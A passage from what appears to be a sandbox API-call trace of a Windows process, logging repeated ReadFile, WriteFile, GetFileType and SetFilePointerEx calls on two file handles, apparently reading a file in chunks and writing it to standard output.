0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.739] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.739] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.740] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.740] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.741] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.742] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.743] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.743] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.744] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.744] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.745] GetFileType (hFile=0x50) returned 0x1 [0147.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.745] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.745] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.745] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.745] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.745] GetFileType (hFile=0x50) returned 0x1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, 